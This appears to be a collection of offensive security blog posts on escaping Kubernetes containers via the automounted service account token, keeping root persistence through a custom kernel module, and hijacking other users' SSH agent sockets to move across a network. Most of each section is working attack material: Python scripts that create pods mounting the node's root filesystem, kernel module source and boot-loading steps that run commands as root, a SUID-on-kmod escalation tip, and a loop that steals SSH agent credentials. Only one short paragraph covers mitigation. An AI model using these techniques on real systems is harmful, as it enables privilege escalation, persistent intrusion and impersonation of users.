Abuse Kubernetes with the AutomountServiceAccountToken

While I was recently practicing to take my Certified Kuberenetes Administrator (CKA) exam, I ran across an interesting default option called automountServiceAccountToken. This option, automatically mounts the service account token, within each container of a given pod. This account token is meant to provide the pod the ability to interact with the Kubernetes API server. This option being enabled by default, creates a great way for attackers with access to a single container, to abuse Kubernetes with the Automount Service Account token.

What is the Service Account Token?

Within Kubernetes, even a pod with only a single container must have a service account within its specifications. This is because the service account dictates permissions and is used to run a pods processes. By default, if a service account isn’t provided during the creation of the pod, then the “default” service account for the pods namespace is added automatically. Without a different service account being automatically created within each namespace and added to each pod spec, there wouldn’t be any real resource/process separation happening between different namespaces.

How does automountServiceAccountToken work?

When a namespace is created within Kubernetes the kube-controller-manager uses the serviceaccount-controller and the token-controller to make sure the service account called “default” exists with a valid API Bearer token. When a pod is created within the new namespace, the admission controller then checks the pod spec for a valid service account and adds the “default” service account if one doesn’t exist. If the “automountServiceAccountToken” option isn’t explicitly set to false within either the pod spec or service account spec, then the admission controller will also add a volume mount for the service account token, to each container within the pod spec. This results in the namespaced secret for the service account token being mounted directly to “/var/run/secrets/kubernetes.io/serviceaccount” within every running container by default.

Why is the AutomountServiceAccountToken bad?

Since the permissions are assigned to a service account and all pod processes are run as the service account, effectively all pods within a given namespace operate at the same level. So when the service account token mount was added to provide better access to the Kubernetes API server, there wasn’t much need to disable it by default. Additionally, some popular tooling have utilized the service account token to communicate with Kubernetes and as such it may be required in order to meet compatibility requirements.

However, this token becomes problematic if an attacker gains access to a container via some other exploit. This is further compounded by the fact that the default service account permissions are effectively read-write within the namespace and global read for most resource types. So with a simple script or even curl commands we can abuse Kubernetes with the automount service account token.

How to Abuse AutomountServiceAccountToken

I could probably write a whole post around the topic of interacting with the Kubernetes API, but lucky almost all major programing languages already have Kubernetes client libraries. In my case, I often write in python and the python client library can handle loading a containers service account token. With that token we can utilize simple function calls like within the following example to create and even delete our own pods.

from kubernetes import client, config
import time

# Load the containers local service account token
config.load_incluster_config()

# get the current namespace from automount for ease of use :)
current_namespace = open("/var/run/secrets/kubernetes.io/serviceaccount/namespace").read()

# Establish the core API object to interact with
v1=client.CoreV1Api()

# create a basic pod manifest
pod_manifest = {
            'apiVersion': 'v1',
            'kind': 'Pod',
            'metadata': {
                'name': 'busybox'
            },
            'spec': {
                'containers': [{
                    'image': 'busybox',
                    'name': 'sleep',
                    "args": [
                        "/bin/sh",
                        "-c", 
                        "while true;do python -c '<Shell code>';sleep 5; done"
                    ]
                }]
            }
        }

print("Listing all pods within the current namespace, before trying to add a pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to deploy a new pod with our custom pod manifest")
v1.create_namespaced_pod(namespace=current_namespace, body=pod_manifest)

time.sleep(10)
print("Listing all pods within the current namespace, after trying to add a busybox pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to delete the  busybox pod we just created")
v1.delete_namespaced_pod(name="busybox", namespace=current_namespace, body=client.V1DeleteOptions())

time.sleep(10)
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

Using service account token to escalate privilege with node root volume

Since by default there are not any pod security polices to restrict the ability to mount a nodes local root filesystem. We can try to leverage the service account token within a compromised container to create a new pod with a volume which mounts the nodes root filesystem with a similar script.

from kubernetes import client, config
import time

config.load_incluster_config()
from kubernetes import client, config
import time

# Load the containers local service account token
config.load_incluster_config()

# get the current namespace from automount for ease of use :)
current_namespace = open("/var/run/secrets/kubernetes.io/serviceaccount/namespace").read()

# Establish the core API object to interact with
v1=client.CoreV1Api()

# create a basic pod manifest
pod_manifest = {
            'apiVersion': 'v1',
            'kind': 'Pod',
            'metadata': {
                'name': 'support'
            },
            'spec': {
                'containers': [{
                    'image': 'busybox',
                    'name': 'sleep',
                    "args": [
                        "/bin/sh",
                        "-c",
                        "while true;do python -c '<Shell code>';sleep 5; done"
                    ],
					'volumeMounts': [{
                        'name': 'host',
                        'mountPath': '/host'
                    }]
                }],
                'volumes': [{
                    'name': 'host',
                    'hostPath': {
                        'path': '/',
                        'type': 'Directory'
                    }
                }]
            }
        }

print("Listing all pods within the current namespace, before trying to add a pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to deploy a new pod with our custom comand")
v1.create_namespaced_pod(namespace=current_namespace,body=pod_manifest)

time.sleep(10)
print("Listing all pods within the current namespace, after trying to add a busybox pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

You can also use the node selector and label like “kubernetes.io/hostname” to try and get the new pod to spin up on a higher value control plane node.

With access to a pod container with the nodes root filesystem mounted, normal file and credential pillaging can take place. Also easier persistence methods can be used with write access, like adding a crontab or my recent post on leveraging controlled failure of systemd services, to gain a foot hold on the Kubernetes control plane.

How to Fix AutomountServiceAccountToken Issues?

Based on the official issue #57601, opened in late 2017. This issue is unlikely to be addressed until API v2 is available, because it’s currently required for backwards compatibility. That being said, this issue can still be addresses manually by setting “automountServiceAccountToken: false” on the “default” service account for each namespace and/or creating an Initializer to inject a custom service account upon pod creation. The only other option would be to patch a change to the admission controller, but that would risk issues with compatibility and break future upgrades.

Establish Persistence with a Custom Kernel Module

First and foremost I have to admit that establishing persistence with a custom kernel module, isn’t the most ideal way. Creating kernel modules isn’t that easy. Kernel modules are normally compiled against a single kernel version, there are significant limitations on what can be done in kernel space, and errors can cause the system to freeze or crash. Regardless, I think its a valuable learning experience, that all Linux security professionals should understand. For a much easier way to maintain access to modern system check out my post on persistence with systemd timers.

As mentioned, kernel space capabilities are limited to dealing with files and devices on behalf of userspace applications. Since modules themselves are loaded into the running kernel it can be fairly difficult to write persistence code within a module that plays nice with the kernel space protections and limited functionality. Instead we can leverage a kernel function “call_usermodehelper” to execute a command in the requesting userspace. Since by default only the root user can request a module be loaded, this gives us command execution as root. In its most simplistic form the source code for a module, test_shell.c would look like the following.

#include <linux/module.h>    // included for all kernel modules
#include <linux/init.h>      // included for __init and __exit macros

MODULE_LICENSE("GPL");
MODULE_AUTHOR("sleventyeleven");
MODULE_DESCRIPTION("A Simple shell module");

static int __init shell_init(void)
{
    call_usermodehelper("/tmp/exe", NULL, NULL, UMH_WAIT_EXEC);
    return 0;    // Non-zero return means that the module couldn't be loaded.
}

static void __exit shell_cleanup(void)
{
    printk(KERN_INFO "Uninstalling Module!\n");
}

module_init(shell_init);
module_exit(shell_cleanup);

Since kernel mode capabilities and libraries are so limited, we can further simplify the payload execution by staging it into a standard c application instead. This allows for the module to attempt to execute the staged application in a root terminal and still return normally regardless of what happens. The source code for a simple c execution program, nammed exe.c, might look like the following.

#include <stdlib.h>
int main(void)
{
    system("wall \"Hello There Im a Module!\"");
    return 0;
}

If we don’t want to stage a second executable to establish persistence with the custom kernel module, its possible to create variables for the users environment and command line arguments to be passed directly to the ‘call_usermodeheler’ function. The module source code to do this might look like the following.

#include <linux/module.h>    // included for all kernel modules
#include <linux/init.h>      // included for __init and __exit macros


MODULE_LICENSE("GPL");
MODULE_AUTHOR("sleventyeleven");
MODULE_DESCRIPTION("A Simple shell module");

static int __init shell_init(void)
{

    static char *envp[] = {
    "HOME=/",
    "TERM=linux",
    "USER=root",
    "SHELL=/bin/bash",
    "PATH=/sbin:/usr/sbin:/bin:/usr/bin",
    NULL};

    char *argv[] = {
    "wall",
    "\"Hello I'm a Module!\"",
    NULL};

    call_usermodehelper("/bin/bash", argv, envp, UMH_WAIT_EXEC);
    printk(KERN_INFO "Installing Module!\n");
    return 0;    // Non-zero return means that the module couldn't be loaded.
}

static void __exit shell_cleanup(void)
{
    printk(KERN_INFO "Uninstalling Module!\n");
}

module_init(shell_init);
module_exit(shell_cleanup);

Before compiling the module, you will need to be on the target system or a similar system with the same kernel version. You will also need to have all of the required tools for kernel development and the current kernels header files. The easiest way to do that is to run ‘apt-get install build-essential linux-headers-$(uname -r)’ on Debian based systems or ‘yum install kernel-headers kernel-devel glibc-devel gcc gcc-c++ make’ for Redhat based systems.

Once the build tools are installed, we can create a Makefile with a kbuild (kernel builder) extension at the top to compile our module. Just keep in might that kbuild will switch to the kernel source directory and only allow use of includes of headers within the original source.

obj-m += test_shell.o

all:
         make -C /lib/modules/$(shell uname -r)/build M=${PWD} modules

clean:
        make -C /lib/modules/$(shell uname -r)/build M=${PWD} clean

You can use a command like ‘insmod test_shell.ko’ to load a module directly into the kernel and ‘rmmod test_shell.ko’ to remove the module. This allows for easy testing of modules, before configuring them to automatically loaded at boot.

Once the module is complied and tests successfully, we can copy the module to the current kernels’ modules directory.

cp test_shell.ko /lib/modules/`uname -r`/kernel/lib/

Next we need to run ‘depmod’ to build out the binary tree files of all the modules and dependencies. Without the dependency tree updated, the system wont know our module exists or how to load it into the kernel.

depmod -a 

If we are going to stage the second executable for the module to attempt to execute, then we will need to compile it with gcc like the following.

gcc exe.c -o /tmp/exe

To have persistence with the custom kernel module loaded at boot time, we need to modify the config files for either modprobe or kmod depending on which is used. In most cases you can easily figure out if its a kmod system by looking if the standard module tools are just symbolic links to kmod. This can be done with a command like the following.

ls -al `which modprobe`

If the you do see modprobe is just a symbolic link to kmod, getting a registered module to start at boot is fairly simple. Just place the name of the module, minus the .ko extension, in the /etc/module config file. This can be done with a simple command like the following. It will cause systemd-modules-load service to utlize kmod, to automatically load the module on boot.

echo 'test-shell' >> /etc/modules

Interesting you can actually set the SUID bit on kmod so standard users can load modules as root. Whereas if you set SUID on legacy modprobe executable, it still runs in the userspace instead. So simply setting SUID on the kmod executable can be an easy way to establish privilege escalation similar to the dash shell, I’ve blogged about before.

If its not a kmod system, we can instead utilize modprobe to automatically start the custom module by creating a .conf file in the /etc/modeprobe.d/ directory. The content of the .conf should look similar too:

install test_shell

On modprobe systems, standard users can also request a module be loaded, if there is a valid configuration file that already exists. But any code execution is done within the requesting users context. Interestingly enough you can have modprobe run a terminal command after loading a module by appending a command to the end of install statement in the config file. That could work as a persistence method as well, but there is no guarantee all filesystems are mounted and networking has been established when the module is loaded.

With all that work complete, we have established persistence, until the kernel is updated at least.

Leverage SSH Agents to Move Across the Network

Accessing a production system in a Linux environment these days often requires a lot of ssh tunneling in order to get access to restricted systems. This is because it doesn’t make sense to publicly expose SSH to the internet or even your general-use, internal network. Instead there might be a bastion or jump box with ssh exposed as your initial way into the environment. Once connecting to the bastion host successfully you can then connect to another system within that restricted network or maybe even repeat the process to gain access to even more restricted hosts.

In order to handle authentication across multiple systems users leverage ssh agents. An SSH agent is effectively a helper program which stores unencrypted identity keys and credentials in memory. This allows for the SSH client to access these credentials via a Unix stream stock. The socket makes it so the end user doesn’t have to provide their credentials multiple times. The user can also request the SSH client retains access to the socket, when connecting to another system, by enabling agent-forwarding with the -A flag.

With SSH agent-forwarding enabled, the SSH client essentially creates a linked copy of the stream socket on the remote system. By default the socket is created in the /tmp directory in a folder named ssh-<10 random characters>, with the socket named agent.<agent pid>. The ssh agent folder is only granted privileges to the connecting user account. To see what agents are around on a given machine you can look through the /tmp directory with a command similar to:

ls /tmp -l | egrep 'ssh-.{10}$'

Finding SSH Agents

Since agent sockets are stored in /tmp and the reference to which agent to use is controled entirely by the value in the SSH_AUTH_SOCK environment variable. The root account, superusers, and possibly sudoers can change their environment variable to the socket of another connected user and effectively masquerade as them on the network. In fact you would even have accesses to any of the other keys the user added to the agent. Given you have access to a shared systems root account, you could use commands like the following to impersonate the user and view a list of registered keys.

ls /tmp| egrep 'ssh-.{10}$' # list the agent sockets that may be available
export SSH_AUTH_SOCK=/tmp/'ssh-.{10}$'/agent.<pid> # choose one and set appropriate values as you SSH_AUTH_SOCK environment variable
ssh-add -l # list all credentials available to the agent

The commands could even all be combined into a single loop like the one bellow. However, the ability to query and leverage the credentials is dependent on a stable connection from the target user. Stale agents can hang, because the socket cleanup process doesn’t necessarily happen once a session is closed.

for AGENT in $(ls /tmp| egrep 'ssh-.{10}$'); do export SSH_AUTH_SOCK=/tmp/$AGENT/$(ls /tmp/$AGENT);echo $AGENT $(stat -c '%U' /tmp/$AGENT);timeout 10 ssh-add -l;done;

Note: A lot of common programs like git, rsync, scp, etc also allow you yo leverage SSH agents. So if a given agent doesn’t get you access to another system, also be sure to try and use it to authenticate against common services.

Impersonating users and pivoting

Once you have an agent you want to leverage, just set it as the SSH_AUTH_SOCK environment variable. Then use it to try and log into other systems or services as the targeted user. Its also worth mentioning that you also be able to leverage the ssh agent and port forwarding to gain access to otherwise restricted system. I’ve created a somewhat related post about leveraging port forwarding in a previous post.

Always run commands like w or who to see where the user is connecting from. Then use that IP address to try and connect back to the users origin system. Most of the time, the users public key is added to their own systems authorized_keys file for ease of access.

This issue is most often seen in development environments, where users traditionally have elevated system access. These systems are also not as well defended or updated as often as production systems. That coupled with the fact that most of the time users don’t maintain account separation between development and production environments, makes it prime to leverage ssh agents.